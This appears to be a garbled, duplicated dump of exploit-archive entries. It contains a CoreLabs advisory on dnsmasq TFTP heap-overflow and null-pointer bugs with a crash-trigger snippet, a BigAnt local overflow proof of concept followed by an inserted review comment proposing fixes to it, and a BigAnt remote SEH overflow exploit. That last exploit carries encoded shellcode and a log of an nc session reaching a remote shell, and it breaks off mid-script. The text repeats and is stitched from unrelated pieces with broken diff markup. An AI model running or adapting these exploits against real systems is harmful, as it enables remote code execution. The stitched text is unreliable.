enabled ('--enable-tfp'). This service is not enabled by default on most
|
||||
distributions; in particular it is not enabled by default on OpenWRT or
|
||||
DD-WRT. Chances of successful exploitation increase when a long
|
||||
directory prefix is used for TFTP. Code will be executed with the
|
||||
privileges of the user running dnsmasq, which is normally a
|
||||
non-privileged one.
|
||||
|
||||
Additionally there is a potential DoS attack to the TFTP service by
|
||||
exploiting a null-pointer dereference vulnerability.
|
||||
|
||||
|
||||
4. *Vulnerable packages*
|
||||
|
||||
. dnsmasq 2.40.
|
||||
. dnsmasq 2.41.
|
||||
. dnsmasq 2.42.
|
||||
. dnsmasq 2.43.
|
||||
. dnsmasq 2.44.
|
||||
. dnsmasq 2.45.
|
||||
. dnsmasq 2.46.
|
||||
. dnsmasq 2.47.
|
||||
. dnsmasq 2.48.
|
||||
. dnsmasq 2.49.
|
||||
. Older versions are probably affected too, but they were not checked.
|
||||
|
||||
|
||||
5. *Non-vulnerable packages*
|
||||
|
||||
. dnsmasq 2.50
|
||||
|
||||
|
||||
6. *Vendor Information, Solutions and Workarounds*
|
||||
|
||||
If the TFTP service is enabled and patching is not available
|
||||
immediately, a valid workaround is to filter TFTP for untrusted hosts in
|
||||
the network (such as the Internet). This is the default configuration
|
||||
when enabling TFTP on most home routers.
|
||||
|
||||
Patches are already available from the software author. Most
|
||||
distributions should release updates for binary packages soon.
|
||||
|
||||
|
||||
7. *Credits*
|
||||
|
||||
The heap-overflow vulnerability (CVE-2009-2957) was discovered during
|
||||
Bugweek 2009 by Pablo Jorge and Alberto Solino from the team "Los
|
||||
Herederos de Don Pablo" of Core Security Technologies.
|
||||
|
||||
The null-pointer dereference (CVE-2009-2958) was reported to the author
|
||||
of dnsmasq independently by an uncredited code auditor. It was merged
|
||||
with this advisory for user's convenience.
|
||||
|
||||
|
||||
8. *Technical Description*
|
||||
|
||||
8.1. *Heap Overflow vulnerability (CVE-2009-2957, BID 36121)*
|
||||
|
||||
First let's focus on the overflow vulnerability. The 'tftp_request'
|
||||
calls 'strncat' on 'daemon->namebuff', which has a predefined size of
|
||||
'MAXDNAME' bytes (defaulting to 1025).
|
||||
|
||||
/-----------
|
||||
else if (filename[0] == '/')
|
||||
daemon->namebuff[0] = 0;
|
||||
strncat(daemon->namebuff, filename, MAXDNAME);
|
||||
- -----------/
|
||||
|
||||
This may cause a heap overflow because 'daemon->namebuff' may already
|
||||
contain data, namely the configured 'daemon->tftp_prefix' passed to the
|
||||
daemon via a configuration file.
|
||||
|
||||
/-----------
|
||||
if (daemon->tftp_prefix)
|
||||
{
|
||||
if (daemon->tftp_prefix[0] == '/')
|
||||
daemon->namebuff[0] = 0;
|
||||
strncat(daemon->namebuff, daemon->tftp_prefix, MAXDNAME)
|
||||
- -----------/
|
||||
|
||||
The default prefix is '/var/tftpd', but if a longer prefix is used,
|
||||
arbitrary code execution may be possible.
|
||||
|
||||
Sending the string resulting from the execution of the following python
|
||||
snippet to a vulnerable server, with a long enough directory prefix
|
||||
configured, should crash the daemon.
|
||||
|
||||
/-----------
|
||||
import sys
|
||||
sys.stdout.write( '\x00\x01' + "A"*1535 + '\x00' + "netascii" + '\x00' )
|
||||
- -----------/
|
||||
|
||||
8.2. *Null-pointer Dereference vulnerability (CVE-2009-2958, BID 36120)*
|
||||
|
||||
Now onto the null-pointer dereference. The user can crash the service by
|
||||
handcrafting a packet, because of a problem on the guard of the first if
|
||||
inside this code loop:
|
||||
|
||||
/-----------
|
||||
while ((opt = next(&p, end)))
|
||||
{
|
||||
if (strcasecmp(opt, "blksize") == 0 &&
|
||||
(opt = next(&p, end)) &&
|
||||
!(daemon->options & OPT_TFTP_NOBLOCK))
|
||||
{
|
||||
transfer->blocksize = atoi(opt);
|
||||
if (transfer->blocksize < 1)
|
||||
transfer->blocksize = 1;
|
||||
if (transfer->blocksize > (unsigned)daemon->packet_buff_sz - 4)
|
||||
transfer->blocksize = (unsigned)daemon->packet_buff_sz - 4;
|
||||
transfer->opt_blocksize = 1;
|
||||
transfer->block = 0;
|
||||
}
|
||||
|
||||
if (strcasecmp(opt, "tsize") == 0 && next(&p, end) &&
|
||||
!transfer->netascii)
|
||||
{
|
||||
transfer->opt_transize = 1;
|
||||
transfer->block = 0;
|
||||
}
|
||||
}
|
||||
- -----------/
|
||||
|
||||
The problem exists because the guard of the first if includes the result
|
||||
of 'opt = next(&p, end)' as part of the check. If this returns 'NULL',
|
||||
the guard will fail and in the next if 'strcasecmp(opt, "tsize")' will
|
||||
derrefence the null-pointer.
|
||||
|
||||
|
||||
9. *Report Timeline*
|
||||
|
||||
. 2009-08-20:
|
||||
Core Security Technologies notifies Simon Kelley of the vulnerability,
|
||||
including technical details of the vulnerability in an advisory draft.
|
||||
|
||||
. 2009-08-21:
|
||||
Simon Kelley acknowledges the vulnerability and confirms to be working
|
||||
on a patch. He also informs that he is aware that most home router
|
||||
distributions have tftp turned off by default, and firewalled, and
|
||||
suggests this should be mentioned on the advisory. Simon also mentions
|
||||
that a NULL-pointer dereference bug has also been discovered on that
|
||||
code, and suggests merging both bugs in the same advisory. Monday 31/08
|
||||
is accepted as a possible release date for this advisory, and help is
|
||||
offered in contacting package maintainers of dnsmasq for most operating
|
||||
systems.
|
||||
|
||||
. 2009-08-21:
|
||||
Core changes the advisory draft to accommodate Simon's suggestions.
|
||||
About the NULL-pointer dereference, Core mentions the terms it thinks
|
||||
appropriate for the bug to be merged into this advisory, and details how
|
||||
this would affect the following procedures, such as asking for a
|
||||
CVE/Bugtraq ID.
|
||||
|
||||
. 2009-08-23:
|
||||
Simon Kelley contacts Core back, saying that the terms for the
|
||||
null-pointer derrefence bug to be included in the advisory are ok. He
|
||||
also mentions that the finder of this bug prefers to remain uncredited
|
||||
in this advisory. Details are sent by him about the new bug so that the
|
||||
advisory draft can be updated to include it.
|
||||
|
||||
. 2009-08-23:
|
||||
Core asks for proper CVE and Bugtraq ID numbers, specifying it believes
|
||||
each vulnerability reported in this advisory should be assigned its own.
|
||||
|
||||
. 2009-08-23:
|
||||
Vincent Danen, from Red Hat's Security Response Team contacts Core in
|
||||
order to discuss both vulnerabilities by a secure communications
|
||||
channel, and offers its help in obtaining proper CVE numbers, specifying
|
||||
they also believe a separate number should be assigned to each
|
||||
vulnerability.
|
||||
|
||||
. 2009-08-23:
|
||||
Core replies to Vincent Danen by sending its gpg key. Core also mentions
|
||||
separate CVE numbers have already been asked.
|
||||
|
||||
. 2009-08-23:
|
||||
Core replies to Simon Kelley, including a new advisory draft with both
|
||||
bugs merged.
|
||||
|
||||
. 2009-08-23:
|
||||
Core receives proper CVE and Bugtraq ID numbers for both bugs, and sends
|
||||
them to Red Hat and Simon Kelley.
|
||||
|
||||
. 2009-08-31:
|
||||
The advisory CORE-2009-0820 is published.
|
||||
|
||||
|
||||
10. *References*
|
||||
|
||||
[1] http://www.thekelleys.org.uk/dnsmasq/doc.html
|
||||
[2] http://www.isi.edu/in-notes/ien/ien133.txt
|
||||
[3] http://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol
|
||||
|
||||
|
||||
11. *About CoreLabs*
|
||||
|
||||
CoreLabs, the research center of Core Security Technologies, is charged
|
||||
with anticipating the future needs and requirements for information
|
||||
security technologies. We conduct our research in several important
|
||||
areas of computer security including system vulnerabilities, cyber
|
||||
attack planning and simulation, source code auditing, and cryptography.
|
||||
Our results include problem formalization, identification of
|
||||
vulnerabilities, novel solutions and prototypes for new technologies.
|
||||
CoreLabs regularly publishes security advisories, technical papers,
|
||||
project information and shared software tools for public use at:
|
||||
http://www.coresecurity.com/corelabs.
|
||||
|
||||
|
||||
12. *About Core Security Technologies*
|
||||
|
||||
Core Security Technologies develops strategic solutions that help
|
||||
security-conscious organizations worldwide develop and maintain a
|
||||
proactive process for securing their networks. The company's flagship
|
||||
product, CORE IMPACT, is the most comprehensive product for performing
|
||||
enterprise security assurance testing. CORE IMPACT evaluates network,
|
||||
endpoint and end-user vulnerabilities and identifies what resources are
|
||||
exposed. It enables organizations to determine if current security
|
||||
investments are detecting and preventing attacks. Core Security
|
||||
Technologies augments its leading technology solution with world-class
|
||||
security consulting services, including penetration testing and software
|
||||
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
|
||||
Security Technologies can be reached at 617-399-6980 or on the Web at
|
||||
http://www.coresecurity.com.
|
||||
|
||||
|
||||
13. *Disclaimer*
|
||||
|
||||
The contents of this advisory are copyright (c) 2009 Core Security
|
||||
Technologies and (c) 2009 CoreLabs, and may be distributed freely
|
||||
provided that no fee is charged for this distribution and proper credit
|
||||
is given.
|
||||
|
||||
|
||||
14. *PGP/GPG Keys*
|
||||
|
||||
This advisory has been signed with the GPG key of Core Security
|
||||
Technologies advisories team, which is available for download at
|
||||
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
|
||||
-----BEGIN PGP SIGNATURE-----
|
||||
Version: GnuPG v1.4.7 (MingW32)
|
||||
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
|
||||
|
||||
iD8DBQFKp9rOyNibggitWa0RAjkbAJ0SLIFwI1CMF7IOHSDv+Fg0DwFNQwCfWsZm
|
||||
wa3syAdyXlixVdQhdk5vcK0=
|
||||
=tfqM
|
||||
-----END PGP SIGNATURE-----
|
||||
|
||||
# milw0rm.com [2009-09-09]
|
||||
-----BEGIN PGP SIGNED MESSAGE-----
|
||||
Hash: SHA1
|
||||
|
||||
Core Security Technologies - CoreLabs Advisory
|
||||
http://www.coresecurity.com/corelabs/
|
||||
|
||||
Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
|
||||
|
||||
|
||||
1. *Advisory Information*
|
||||
|
||||
Title: Dnsmasq Heap Overflow and Null-pointer Dereference on TFTP Server
|
||||
Advisory ID: CORE-2009-0820
|
||||
Advisory URL: http://www.coresecurity.com/content/dnsmasq-vulnerabilities
|
||||
Date published: 2009-08-31
|
||||
Date of last update: 2009-08-31
|
||||
Vendors contacted: Simon Kelley
|
||||
Release mode: Coordinated release
|
||||
|
||||
|
||||
2. *Vulnerability Information*
|
||||
|
||||
Class: Buffer overflow
|
||||
Remotely Exploitable: Yes
|
||||
Locally Exploitable: No
|
||||
Bugtraq ID: 36120, 36121
|
||||
CVE Name: CVE-2009-2957, CVE-2009-2958
|
||||
|
||||
|
||||
3. *Vulnerability Description*
|
||||
|
||||
Dnsmasq is a lightweight DNS forwarder and DHCP server. A vulnerability
|
||||
has been found that may allow an attacker to execute arbitrary code on
|
||||
servers or home routers running dnsmasq[1] with the TFTP service[2][3]
|
||||
enabled ('--enable-tfp'). This service is not enabled by default on most
|
||||
distributions; in particular it is not enabled by default on OpenWRT or
|
||||
DD-WRT. Chances of successful exploitation increase when a long
|
||||
directory prefix is used for TFTP. Code will be executed with the
|
||||
privileges of the user running dnsmasq, which is normally a
|
||||
non-privileged one.
|
||||
|
||||
Additionally there is a potential DoS attack to the TFTP service by
|
||||
exploiting a null-pointer dereference vulnerability.
|
||||
|
||||
|
||||
4. *Vulnerable packages*
|
||||
|
||||
. dnsmasq 2.40.
|
||||
. dnsmasq 2.41.
|
||||
. dnsmasq 2.42.
|
||||
. dnsmasq 2.43.
|
||||
. dnsmasq 2.44.
|
||||
. dnsmasq 2.45.
|
||||
. dnsmasq 2.46.
|
||||
. dnsmasq 2.47.
|
||||
. dnsmasq 2.48.
|
||||
. dnsmasq 2.49.
|
||||
. Older versions are probably affected too, but they were not checked.
|
||||
|
||||
|
||||
5. *Non-vulnerable packages*
|
||||
|
||||
. dnsmasq 2.50
|
||||
|
||||
|
||||
6. *Vendor Information, Solutions and Workarounds*
|
||||
|
||||
If the TFTP service is enabled and patching is not available
|
||||
immediately, a valid workaround is to filter TFTP for untrusted hosts in
|
||||
the network (such as the Internet). This is the default configuration
|
||||
when enabling TFTP on most home routers.
|
||||
|
||||
Patches are already available from the software author. Most
|
||||
distributions should release updates for binary packages soon.
|
||||
|
||||
|
||||
7. *Credits*
|
||||
|
||||
The heap-overflow vulnerability (CVE-2009-2957) was discovered during
|
||||
Bugweek 2009 by Pablo Jorge and Alberto Solino from the team "Los
|
||||
Herederos de Don Pablo" of Core Security Technologies.
|
||||
|
||||
The null-pointer dereference (CVE-2009-2958) was reported to the author
|
||||
of dnsmasq independently by an uncredited code auditor. It was merged
|
||||
with this advisory for user's convenience.
|
||||
|
||||
|
||||
8. *Technical Description*
|
||||
|
||||
8.1. *Heap Overflow vulnerability (CVE-2009-2957, BID 36121)*
|
||||
|
||||
First let's focus on the overflow vulnerability. The 'tftp_request'
|
||||
calls 'strncat' on 'daemon->namebuff', which has a predefined size of
|
||||
'MAXDNAME' bytes (defaulting to 1025).
|
||||
|
||||
/-----------
|
||||
else if (filename[0] == '/')
|
||||
daemon->namebuff[0] = 0;
|
||||
strncat(daemon->namebuff, filename, MAXDNAME);
|
||||
- -----------/
|
||||
|
||||
This may cause a heap overflow because 'daemon->namebuff' may already
|
||||
contain data, namely the configured 'daemon->tftp_prefix' passed to the
|
||||
daemon via a configuration file.
|
||||
|
||||
/-----------
|
||||
if (daemon->tftp_prefix)
|
||||
{
|
||||
if (daemon->tftp_prefix[0] == '/')
|
||||
daemon->namebuff[0] = 0;
|
||||
strncat(daemon->namebuff, daemon->tftp_prefix, MAXDNAME)
|
||||
- -----------/
|
||||
|
||||
The default prefix is '/var/tftpd', but if a longer prefix is used,
|
||||
arbitrary code execution may be possible.
|
||||
|
||||
Sending the string resulting from the execution of the following python
|
||||
snippet to a vulnerable server, with a long enough directory prefix
|
||||
configured, should crash the daemon.
|
||||
|
||||
/-----------
|
||||
import sys
|
||||
sys.stdout.write( '\x00\x01' + "A"*1535 + '\x00' + "netascii" + '\x00' )
|
||||
- -----------/
|
||||
|
||||
8.2. *Null-pointer Dereference vulnerability (CVE-2009-2958, BID 36120)*
|
||||
|
||||
Now onto the null-pointer dereference. The user can crash the service by
|
||||
handcrafting a packet, because of a problem on the guard of the first if
|
||||
inside this code loop:
|
||||
|
||||
/-----------
|
||||
while ((opt = next(&p, end)))
|
||||
{
|
||||
if (strcasecmp(opt, "blksize") == 0 &&
|
||||
(opt = next(&p, end)) &&
|
||||
!(daemon->options & OPT_TFTP_NOBLOCK))
|
||||
{
|
||||
transfer->blocksize = atoi(opt);
|
||||
if (transfer->blocksize < 1)
|
||||
transfer->blocksize = 1;
|
||||
if (transfer->blocksize > (unsigned)daemon->packet_buff_sz - 4)
|
||||
transfer->blocksize = (unsigned)daemon->packet_buff_sz - 4;
|
||||
transfer->opt_blocksize = 1;
|
||||
transfer->block = 0;
|
||||
}
|
||||
|
||||
if (strcasecmp(opt, "tsize") == 0 && next(&p, end) &&
|
||||
!transfer->netascii)
|
||||
{
|
||||
transfer->opt_transize = 1;
|
||||
transfer->block = 0;
|
||||
}
|
||||
}
|
||||
- -----------/
|
||||
|
||||
The problem exists because the guard of the first if includes the result
|
||||
of 'opt = next(&p, end)' as part of the check. If this returns 'NULL',
|
||||
the guard will fail and in the next if 'strcasecmp(opt, "tsize")' will
|
||||
derrefence the null-pointer.
|
||||
|
||||
|
||||
9. *Report Timeline*
|
||||
|
||||
. 2009-08-20:
|
||||
Core Security Technologies notifies Simon Kelley of the vulnerability,
|
||||
including technical details of the vulnerability in an advisory draft.
|
||||
|
||||
. 2009-08-21:
|
||||
Simon Kelley acknowledges the vulnerability and confirms to be working
|
||||
on a patch. He also informs that he is aware that most home router
|
||||
distributions have tftp turned off by default, and firewalled, and
|
||||
suggests this should be mentioned on the advisory. Simon also mentions
|
||||
that a NULL-pointer dereference bug has also been discovered on that
|
||||
code, and suggests merging both bugs in the same advisory. Monday 31/08
|
||||
is accepted as a possible release date for this advisory, and help is
|
||||
offered in contacting package maintainers of dnsmasq for most operating
|
||||
systems.
|
||||
|
||||
. 2009-08-21:
|
||||
Core changes the advisory draft to accommodate Simon's suggestions.
|
||||
About the NULL-pointer dereference, Core mentions the terms it thinks
|
||||
appropriate for the bug to be merged into this advisory, and details how
|
||||
this would affect the following procedures, such as asking for a
|
||||
CVE/Bugtraq ID.
|
||||
|
||||
. 2009-08-23:
|
||||
Simon Kelley contacts Core back, saying that the terms for the
|
||||
null-pointer derrefence bug to be included in the advisory are ok. He
|
||||
also mentions that the finder of this bug prefers to remain uncredited
|
||||
in this advisory. Details are sent by him about the new bug so that the
|
||||
advisory draft can be updated to include it.
|
||||
|
||||
. 2009-08-23:
|
||||
Core asks for proper CVE and Bugtraq ID numbers, specifying it believes
|
||||
each vulnerability reported in this advisory should be assigned its own.
|
||||
|
||||
. 2009-08-23:
|
||||
Vincent Danen, from Red Hat's Security Response Team contacts Core in
|
||||
order to discuss both vulnerabilities by a secure communications
|
||||
channel, and offers its help in obtaining proper CVE numbers, specifying
|
||||
they also believe a separate number should be assigned to each
|
||||
vulnerability.
|
||||
|
||||
. 2009-08-23:
|
||||
Core replies to Vincent Danen by sending its gpg key. Core also mentions
|
||||
separate CVE numbers have already been asked.
|
||||
|
||||
. 2009-08-23:
|
||||
Core replies to Simon Kelley, including a new advisory draft with both
|
||||
bugs merged.
|
||||
|
||||
. 2009-08-23:
|
||||
Core receives proper CVE and Bugtraq ID numbers for both bugs, and sends
|
||||
them to Red Hat and Simon Kelley.
|
||||
|
||||
. 2009-08-31:
|
||||
The advisory CORE-2009-0820 is published.
|
||||
|
||||
|
||||
10. *References*
|
||||
|
||||
[1] http://www.thekelleys.org.uk/dnsmasq/doc.html
|
||||
[2] http://www.isi.edu/in-notes/ien/ien133.txt
|
||||
[3] http://en.wikipedia.org/wiki/Trivial_File_Transfer_Protocol
|
||||
|
||||
|
||||
11. *About CoreLabs*
|
||||
|
||||
CoreLabs, the research center of Core Security Technologies, is charged
|
||||
with anticipating the future needs and requirements for information
|
||||
security technologies. We conduct our research in several important
|
||||
areas of computer security including system vulnerabilities, cyber
|
||||
attack planning and simulation, source code auditing, and cryptography.
|
||||
Our results include problem formalization, identification of
|
||||
vulnerabilities, novel solutions and prototypes for new technologies.
|
||||
CoreLabs regularly publishes security advisories, technical papers,
|
||||
project information and shared software tools for public use at:
|
||||
http://www.coresecurity.com/corelabs.
|
||||
|
||||
|
||||
12. *About Core Security Technologies*
|
||||
|
||||
Core Security Technologies develops strategic solutions that help
|
||||
security-conscious organizations worldwide develop and maintain a
|
||||
proactive process for securing their networks. The company's flagship
|
||||
product, CORE IMPACT, is the most comprehensive product for performing
|
||||
enterprise security assurance testing. CORE IMPACT evaluates network,
|
||||
endpoint and end-user vulnerabilities and identifies what resources are
|
||||
exposed. It enables organizations to determine if current security
|
||||
investments are detecting and preventing attacks. Core Security
|
||||
Technologies augments its leading technology solution with world-class
|
||||
security consulting services, including penetration testing and software
|
||||
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
|
||||
Security Technologies can be reached at 617-399-6980 or on the Web at
|
||||
http://www.coresecurity.com.
|
||||
|
||||
|
||||
13. *Disclaimer*
|
||||
|
||||
The contents of this advisory are copyright (c) 2009 Core Security
|
||||
Technologies and (c) 2009 CoreLabs, and may be distributed freely
|
||||
provided that no fee is charged for this distribution and proper credit
|
||||
is given.
|
||||
|
||||
|
||||
14. *PGP/GPG Keys*
|
||||
|
||||
This advisory has been signed with the GPG key of Core Security
|
||||
Technologies advisories team, which is available for download at
|
||||
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
|
||||
-----BEGIN PGP SIGNATURE-----
|
||||
Version: GnuPG v1.4.7 (MingW32)
|
||||
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
|
||||
|
||||
iD8DBQFKp9rOyNibggitWa0RAjkbAJ0SLIFwI1CMF7IOHSDv+Fg0DwFNQwCfWsZm
|
||||
wa3syAdyXlixVdQhdk5vcK0=
|
||||
=tfqM
|
||||
-----END PGP SIGNATURE-----
|
||||
|
||||
# milw0rm.com [2009-09-09]
|
||||
@ -1,18 +1,18 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
#######################################################################
|
||||
#
|
||||
# BigAnt Server 2.50 SP1 Local Buffer Overflow PoC
|
||||
# Found By: Dr_IDE
|
||||
# Tested: XPSP3
|
||||
# Usage: Open BigAnt Console, Go to Update, Browse to zip, Boom.
|
||||
#
|
||||
#######################################################################
|
||||
|
||||
buff = ("\x41" * 10000)
|
||||
|
||||
f1 = open("BigAntUpdate.zip","w")
|
||||
f1.write(buff)
|
||||
f1.close()
|
||||
|
||||
# milw0rm.com [2009-09-16]
|
||||
#!/usr/bin/env python
|
||||
|
||||
#######################################################################
|
||||
#
|
||||
# BigAnt Server 2.50 SP1 Local Buffer Overflow PoC
|
||||
# Found By: Dr_IDE
|
||||
# Tested: XPSP3
|
||||
# Usage: Open BigAnt Console, Go to Update, Browse to zip, Boom.
|
||||
#
|
||||
#######################################################################
|
||||
|
||||
buff = ("\x41" * 10000)
|
||||
|
||||
f1 = open("BigAntUpdate.zip","w")
|
||||
f1.write(buff)
|
||||
f1.close()
|
||||
|
||||
# milw0rm.com [2009-09-16]
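Review bot: The crafted update file is written through a text-mode handle that is never closed by a context manager, `f1 = open("BigAntUpdate.zip","w")`; with the current all-0x41 buffer that is harmless, but any later payload carrying 0x0a or 0x0d bytes would be newline-translated on Windows (the stated test platform) and shift the offsets. Replace the three open/write/close lines with `with open("BigAntUpdate.zip", "wb") as f1: f1.write(buff)`, which writes raw bytes and closes the handle even on an exception. A header comment such as `# Crash trigger only: 10000 bytes, no SEH/EIP control demonstrated here` would set expectations for anyone reusing the PoC, since the script shows a crash and nothing beyond it.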
|
||||
@ -1,122 +1,122 @@
|
|||
#!/usr/bin/python
|
||||
###############################################################################
|
||||
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
|
||||
# Matteo Memelli aka ryujin
|
||||
# www.be4mind.com - www.gray-world.net
|
||||
# 04/13/2008
|
||||
# Tested on Windows 2000 Sp4 English
|
||||
# Vulnerable process is AntServer.exe
|
||||
# Offset for SEH overwrite is 954 Bytes
|
||||
#
|
||||
#------------------------------------------------------------------------------
|
||||
# muts you gave me the wrong pill! it's your fault!!!
|
||||
# I wanna go back to the matrix
|
||||
#------------------------------------------------------------------------------
|
||||
#
|
||||
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
|
||||
# [+] Connecting to host...
|
||||
# [+] Overflowing the buffer...
|
||||
# [+] Done! Check your shell on 192.168.1.195:6080
|
||||
# bt ~ # nc -vv 192.168.1.195 4444
|
||||
# 192.168.1.195: inverse host lookup failed: Unknown host
|
||||
# (UNKNOWN) [192.168.1.195] 4444 (krb524) open
|
||||
# Microsoft Windows 2000 [Version 5.00.2195]
|
||||
# (C) Copyright 1985-2000 Microsoft Corp.
|
||||
#
|
||||
# C:\WINNT\system32>
|
||||
#
|
||||
###############################################################################
|
||||
from socket import *
|
||||
from optparse import OptionParser
|
||||
import sys
|
||||
|
||||
print "[*********************************************************************]"
|
||||
print "[* *]"
|
||||
print "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]"
|
||||
print "[* Discovered and Coded By *]"
|
||||
print "[* Matteo Memelli *]"
|
||||
print "[* (ryujin) *]"
|
||||
print "[* www.be4mind.com - www.gray-world.net *]"
|
||||
print "[* *]"
|
||||
print "[*********************************************************************]"
|
||||
usage = "%prog -H TARGET_HOST -P TARGET_PORT"
|
||||
parser = OptionParser(usage=usage)
|
||||
parser.add_option("-H", "--target_host", type="string",
|
||||
action="store", dest="HOST",
|
||||
help="Target Host")
|
||||
parser.add_option("-P", "--target_port", type="int",
|
||||
action="store", dest="PORT",
|
||||
help="Target Port")
|
||||
(options, args) = parser.parse_args()
|
||||
HOST = options.HOST
|
||||
PORT = options.PORT
|
||||
if not (HOST and PORT):
|
||||
parser.print_help()
|
||||
sys.exit()
|
||||
|
||||
# Tried with SEH/THREAD/PROCESS but server crashes anyway
|
||||
# [*] x86/alpha_mixed succeeded, final size 698 SEH
|
||||
shellcode = (
|
||||
"\x89\xe1\xda\xc0\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
|
||||
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
|
||||
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
|
||||
"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4a\x59\x4b\x4f\x4b"
|
||||
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x47\x54\x47\x54\x4c\x4b"
|
||||
"\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x45\x51\x4a"
|
||||
"\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
|
||||
"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
|
||||
"\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x42\x54\x44\x47"
|
||||
"\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47"
|
||||
"\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
|
||||
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
|
||||
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
|
||||
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x49\x53\x50\x31\x49"
|
||||
"\x4b\x42\x44\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x47\x30\x44\x4c"
|
||||
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
|
||||
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
|
||||
"\x4e\x36\x42\x46\x51\x43\x42\x46\x43\x58\x47\x43\x50\x32\x42"
|
||||
"\x48\x42\x57\x43\x43\x50\x32\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
|
||||
"\x43\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
|
||||
"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x45\x58"
|
||||
"\x43\x32\x50\x55\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x49"
|
||||
"\x49\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x46\x33"
|
||||
"\x46\x33\x50\x53\x50\x53\x46\x33\x47\x33\x46\x33\x51\x53\x46"
|
||||
"\x33\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x45\x36"
|
||||
"\x50\x53\x4b\x39\x4d\x31\x4c\x55\x42\x48\x49\x34\x44\x5a\x44"
|
||||
"\x30\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x42\x30\x46\x31"
|
||||
"\x51\x45\x4b\x4f\x48\x50\x43\x58\x4e\x44\x4e\x4d\x46\x4e\x4b"
|
||||
"\x59\x51\x47\x4b\x4f\x48\x56\x46\x33\x50\x55\x4b\x4f\x48\x50"
|
||||
"\x42\x48\x4a\x45\x47\x39\x4b\x36\x47\x39\x51\x47\x4b\x4f\x4e"
|
||||
"\x36\x46\x30\x46\x34\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"
|
||||
"\x43\x58\x4a\x47\x44\x39\x49\x56\x44\x39\x46\x37\x4b\x4f\x49"
|
||||
"\x46\x46\x35\x4b\x4f\x48\x50\x42\x46\x43\x5a\x42\x44\x45\x36"
|
||||
"\x42\x48\x45\x33\x42\x4d\x4c\x49\x4d\x35\x42\x4a\x50\x50\x46"
|
||||
"\x39\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x51\x54\x4d\x59"
|
||||
"\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
|
||||
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58"
|
||||
"\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48\x43\x42\x4b\x4e\x4e\x53\x42"
|
||||
"\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56\x51\x4b\x50\x57"
|
||||
"\x46\x32\x46\x31\x50\x51\x50\x51\x43\x5a\x43\x31\x46\x31\x50"
|
||||
"\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49"
|
||||
"\x43\x35\x48\x4e\x50\x53\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
|
||||
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
|
||||
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x46\x32\x4b\x4f\x4e\x30\x45"
|
||||
"\x38\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x48\x56"
|
||||
"\x4b\x4f\x48\x50\x44\x4a\x41\x41"
|
||||
)
|
||||
|
||||
# 77F8AEDC POP POP RET User32.dll Win 2000 Sp4
|
||||
evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \
|
||||
'\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \
|
||||
'C'*1225
|
||||
print '[+] Connecting to host...'
|
||||
s = socket(AF_INET, SOCK_STREAM)
|
||||
# s.connect(('192.168.1.195', 6080))
|
||||
s.connect((HOST, PORT))
|
||||
print '[+] Overflowing the buffer...'
|
||||
